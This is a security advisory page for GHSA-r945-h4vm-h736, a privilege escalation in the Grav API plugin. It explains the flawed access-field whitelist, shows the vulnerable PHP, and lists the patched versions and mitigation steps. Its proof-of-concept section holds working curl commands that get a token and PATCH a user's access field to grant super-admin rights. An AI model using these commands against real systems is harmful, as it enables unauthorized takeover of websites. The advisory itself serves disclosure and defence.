NIST deprecates RSA-2048 from 2030. Find every one of them before attackers do.
🐘
🐘 Packagist
Not in CISA KEV
HIGH severity

Grav API Privilege Escalation to Super AdminGHSA-r945-h4vm-h736

HIGHFix: getgrav/grav-plugin-api@26f529c

GHSA-r945-h4vm-h736 is a high-severity (CVSS 8.8) CWE-863 vulnerability in getgrav/grav-plugin-api. A fix is available for getgrav/grav-plugin-api — see the affected versions and patch details below.

Also known asCVE-2026-42843
Published
Updated
Affected
1 pkg
Patched
1 / 1
Exploits
None indexed
Exploitation data as of Nov 6, 2026 · OSV.dev, NVD, FIRST.org (EPSS)

Exploitation Status

Proof-of-concept exploit code exists

  • CISA’s SSVC triage found public proof-of-concept exploit code for this CVE, though no confirmed active exploitation.
  • A successful exploit gives an attacker total control of the affected component, not partial access.

Exploitation and automatability from CISA’s SSVC triage for GHSA-r945-h4vm-h736.

EPSS Exploitation Probability

via FIRST.org ↗
0.4%probability of exploitation in next 30 days
Lower Risk0.00%
Lower risk than most CVEs29th percentile — riskier than 29% of all scored CVEsHighest risk
0.00%0.33%0.66%0.99%0.0%0.4%Jun 26Sep 26Nov 26

Probability of exploitation in the next 30 days, from FIRST.org EPSS.

How urgent is this, really

Where this sits among everything scored

Real-World Exposure

1 pkg affected
🐘getgrav/grav-plugin-api

Real-time download stats are indexed for npm and PyPI packages. This vulnerability affects Packagist packages — download data is not available via public APIs for these ecosystems.

Description

Summary

An insecure direct object reference and logic flaw in the Grav API plugin (UsersController::update) allows any authenticated user with basic API access (api.access) to modify their own permission configuration. An attacker can exploit this to escalate their privileges to Super Administrator (admin.super and api.super), leading to full system compromise and potential RCE.

Details

The vulnerability is located in user/plugins/api/classes/Api/Controllers/UsersController.php within the update method.

The API allows users to update their own profiles if they possess the basic api.access permission:

// UsersController.php -> update()
$isSelf = $currentUser->username === $username;
if (!$isSelf) {
    $this->requirePermission($request, 'api.users.write');
} else {
    // Self-edit only requires api.access
    $this->requirePermission($request, 'api.access');
}

However, when filtering the fields that are allowed to be updated via a PATCH request, the access field (which defines the user's role and permissions) is indiscriminately included in the $allowedFields whitelist for all users:

// Partial update - only update provided fields
$allowedFields = ['email', 'fullname', 'title', 'state', 'language', 'content_editor', 'access', 'twofa_enabled'];
foreach ($allowedFields as $field) {
    if (array_key_exists($field, $body)) {
        $user->set($field, $body[$field]);
    }
}

Because there is no secondary check to verify if the user attempting to modify the access field is already an administrator, any low-privileged user can overwrite their own access object with a malicious payload granting themselves super: true.

PoC

  1. Prerequisites: You need a low-privileged user account (eg. user1) that possesses the basic api.access permission.

  2. Obtain JWT: Authenticate to the API to obtain your access_token:

    curl -X POST http://<target>/api/v1/auth/token \
      -H "Content-Type: application/json" \
      -d '{"username":"user1","password":"your_password"}'
    
  3. Exploit: Send a PATCH request to the user update endpoint.

    curl -X PATCH http://<target>/api/v1/users/user1 \
      -H "X-API-Token: <your_access_token>" \
      -H "Content-Type: application/json" \
      -d "{\"access\":{\"admin\":{\"login\":true,\"super\":true},\"api\":{\"access\":true,\"super\":true},\"site\":{\"login\":true}}}"
    
  4. Verification: Log in to the Grav Admin panel using the user credentials. You will now have full Super Administrator privileges.

Impact

This is a vertical Privilege Escalation vulnerability. Any user with baseline API access can elevate themselves to Super Admin. Once Super Admin privileges are obtained, the attacker takes complete control over the CMS. They can modify content, alter configurations, upload malicious plugins, or edit Twig templates outside of the sandbox to achieve RCE on the server.

Affected Packages

1 total 1 fixed
EcosystemPackageVulnerable rangeFix
🐘Packagistgetgrav/grav-plugin-apiall versions1.0.0-beta.15composer require getgrav/grav-plugin-api:^1.0.0-beta.15

Affected Products

1 product · 14 configurations
Application
grav-plugin-apigetgrav
1 version
1.0.0

Detection & mitigation playbook

Open-source dependency
  1. Detect

    Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for getgrav/grav-plugin-api, including transitive dependencies — a direct dependency you never call can still pull in a vulnerable version.

  2. Fix

    Update getgrav/grav-plugin-api to 1.0.0-beta.15 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-r945-h4vm-h736 is resolved across your whole dependency graph.

  3. Workarounds

    Close the privilege gap rather than the entry point: audit which accounts, roles and service identities can reach the affected operation, drop the component to the least privilege it actually needs, and review file and directory permissions created by earlier installs — a default left in place is what makes this reachable.

Frequently Asked Questions

### Summary An insecure direct object reference and logic flaw in the Grav API plugin (`UsersController::update`) allows any authenticated user with basic API access (`api.access`) to modify their own permission configuration. An attacker can exploit this to escalate their privileges to Super Administrator (`admin.super` and `api.super`), leading to full system compromise and potential RCE. ### Details The vulnerability is located in `user/plugins/api/classes/Api/Controllers/UsersController.php` within the `update` method. The API allows users to update their own profiles if they possess t
O3 Security · Impact-Aware SCA

Is GHSA-r945-h4vm-h736 in your dependencies?

Find it across Packagist, including transitive dependencies.

Grav API Privilege Escalation to Super Admin (High 8.8)